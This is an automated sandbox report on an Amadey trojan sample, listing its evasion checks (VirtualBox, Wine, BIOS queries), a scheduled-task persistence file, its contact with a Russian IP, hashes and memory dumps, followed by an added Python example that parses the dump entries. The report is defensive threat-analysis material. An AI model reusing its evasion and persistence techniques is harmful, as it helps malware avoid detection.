C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\prefs-1.js

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\datareporting\glean\db\data.safe.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Windows\Tasks\Test Task17.job

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Temp\pureee.exe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

C:\Users\Admin\AppData\Local\Temp\adada.exe

C:\Users\Admin\AppData\Local\Temp\tmpaddon-2

C:\Users\Admin\AppData\Local\Temp\dropperrr.exe

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\23yzs2h6.default-release\gmp-widevinecdm\4.10.2710.0\LICENSE.txt.tmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3AA0DCD5A74331FBD6F344550EC48B87_D7025277F003EE88ED342C67F3525784

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3AA0DCD5A74331FBD6F344550EC48B87_D7025277F003EE88ED342C67F3525784

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\18E6B4A57A6BC7EC9B861CDF2D6D0D02_EF52C1EC85F21F31CC0157A5C8803013

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\18E6B4A57A6BC7EC9B861CDF2D6D0D02_EF52C1EC85F21F31CC0157A5C8803013

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_93702E680A5530C052C8D2BA33A2225F

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_93702E680A5530C052C8D2BA33A2225F

C:\Windows\Installer\MSIE9BA.tmp

C:\Windows\Installer\MSIEA09.tmp

C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\setuptools-18.2.dist-info\zip-safe

C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe

C:\Config.Msi\e59e72b.rbs

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-31 03:56

Reported

2024-07-31 03:59

Platform

win11-20240730-en

Max time kernel

142s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1872973762-1326452598-87257502-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1872973762-1326452598-87257502-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1872973762-1326452598-87257502-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1872973762-1326452598-87257502-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\explorti.job C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe

"C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Network

Country Destination Domain Proto
RU 185.215.113.19:80 185.215.113.19 tcp
US 8.8.8.8:53 19.113.215.185.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

MD5 f84c467d7176648368090a12c87f0161
SHA1 7126e1c0347b3300592ba1a1a81385d6240174f7
SHA256 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e
SHA512 839aec9230a202cdce5a6c254b4792bf53ba4a087a160b743d4d7c69df95a369ef8384fc4558556eaa4cdab83c897110da0844ba02fa7f539890c078dc555dc9

memory/3836-17-0x00000000002E0000-0x00000000007A4000-memory.dmp

memory/3532-18-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-19-0x0000000000471000-0x000000000049F000-memory.dmp

memory/3532-20-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-21-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-22-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-23-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-24-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-25-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-26-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-27-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-28-0x0000000000470000-0x0000000000934000-memory.dmp

memory/2788-30-0x0000000000470000-0x0000000000934000-memory.dmp

memory/2788-31-0x0000000000470000-0x0000000000934000-memory.dmp

memory/2788-32-0x0000000000470000-0x0000000000934000-memory.dmp

memory/2788-34-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-35-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-36-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-37-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-38-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-39-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-40-0x0000000000470000-0x0000000000934000-memory.dmp

memory/4716-42-0x0000000000470000-0x0000000000934000-memory.dmp

memory/4716-43-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-44-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-45-0x0000000000470000-0x0000000000934000-memory.dmp

memory/3532-46-0x0000000000470000-0x0000000000934000-memory.dmp
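The Files list above uses the sandbox's naming for memory dumps, memory/<pid>-<sequence>-<start>-<end>-memory.dmp, followed by the hashes of the dropped explorti.exe. As an added example, not part of the report or the sandbox's tooling, the following Python parses an excerpt of those entries, normalises each process's dumped regions to offsets from its largest region so that layouts can be compared across processes, and checks the dropped file's SHA256 against the submitted sample's. The constants, regular expressions and function names are this example's own; the excerpt is copied from the lines above but is only a subset of them.

```python
import re
from collections import defaultdict

# Constructed excerpt of the "Files" entries above (a subset of the memory dump
# lines plus the dropped file's hash block), embedded so the example runs offline.
FILES_EXCERPT = """
memory/3836-0-0x00000000002E0000-0x00000000007A4000-memory.dmp
memory/3836-1-0x0000000077456000-0x0000000077458000-memory.dmp
memory/3836-2-0x00000000002E1000-0x000000000030F000-memory.dmp
memory/3836-17-0x00000000002E0000-0x00000000007A4000-memory.dmp
memory/3532-18-0x0000000000470000-0x0000000000934000-memory.dmp
memory/3532-19-0x0000000000471000-0x000000000049F000-memory.dmp
memory/2788-30-0x0000000000470000-0x0000000000934000-memory.dmp
memory/4716-42-0x0000000000470000-0x0000000000934000-memory.dmp
memory/3532-46-0x0000000000470000-0x0000000000934000-memory.dmp
MD5 f84c467d7176648368090a12c87f0161
SHA1 7126e1c0347b3300592ba1a1a81385d6240174f7
SHA256 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e
SHA512 839aec9230a202cdce5a6c254b4792bf53ba4a087a160b743d4d7c69df95a369ef8384fc4558556eaa4cdab83c897110da0844ba02fa7f539890c078dc555dc9
"""

# SHA256 of the submitted sample, as given in the report header and in the
# parent process's file name.
SAMPLE_SHA256 = "5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e"

# memory/<pid>-<sequence>-<start>-<end>-memory.dmp
DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


def parse_dumps(text):
    """One dict per dump line: pid, seq, start, end and size in bytes."""
    dumps = []
    for line in text.splitlines():
        m = DUMP_RE.match(line.strip())
        if not m:
            continue
        start, end = int(m["start"], 16), int(m["end"], 16)
        dumps.append({"pid": int(m["pid"]), "seq": int(m["seq"]),
                      "start": start, "end": end, "size": end - start})
    return dumps


def image_relative_layout(dumps, pid):
    """Express a PID's dumped regions as (offset, size) from its largest region.

    The largest region is treated as the mapped image; regions inside it are
    rebased to offsets, and regions outside it (such as PID 3836's small high
    mapping) are dropped. Two processes running the same image at different
    bases then yield identical layouts.
    """
    regions = {(d["start"], d["end"]) for d in dumps if d["pid"] == pid}
    if not regions:
        return []
    base, top = max(regions, key=lambda r: r[1] - r[0])
    return sorted((s - base, e - s) for s, e in regions if base <= s and e <= top)


def dumps_per_pid(dumps):
    """Number of dump files the sandbox wrote for each PID."""
    counts = defaultdict(int)
    for d in dumps:
        counts[d["pid"]] += 1
    return dict(counts)


def parse_hashes(text):
    """Collect algorithm -> digest lines, rejecting digests of the wrong length."""
    hashes = {}
    for line in text.splitlines():
        m = HASH_RE.match(line.strip())
        if not m:
            continue
        algo, digest = m.group(1), m.group(2).lower()
        if len(digest) != HEX_LEN[algo]:
            raise ValueError(f"{algo} digest has {len(digest)} hex characters")
        hashes[algo] = digest
    return hashes


def is_self_copy(hashes, sample_sha256):
    """True when the dropped file is byte-for-byte the submitted sample."""
    return hashes.get("SHA256") == sample_sha256.lower()


if __name__ == "__main__":
    dumps = parse_dumps(FILES_EXCERPT)
    print("dumps per PID:", dumps_per_pid(dumps))
    for pid in sorted(dumps_per_pid(dumps)):
        layout = [(hex(off), hex(size)) for off, size in image_relative_layout(dumps, pid)]
        print(f"PID {pid}: {layout}")
    print("dropped explorti.exe is a self-copy:",
          is_self_copy(parse_hashes(FILES_EXCERPT), SAMPLE_SHA256))
```

On this excerpt PID 3836 and PID 3532 produce the same layout, a 0x4C4000-byte region with a 0x2E000-byte region at offset 0x1000 inside it, even though one is mapped at 0x2E0000 and the other at 0x470000, which is what you expect when the same image is loaded at two bases. The hash check confirms what the identical SHA256 values in the list already imply: the dropped explorti.exe is a copy of the submitted executable, not a distinct second-stage payload, so one set of file hashes covers both artefacts.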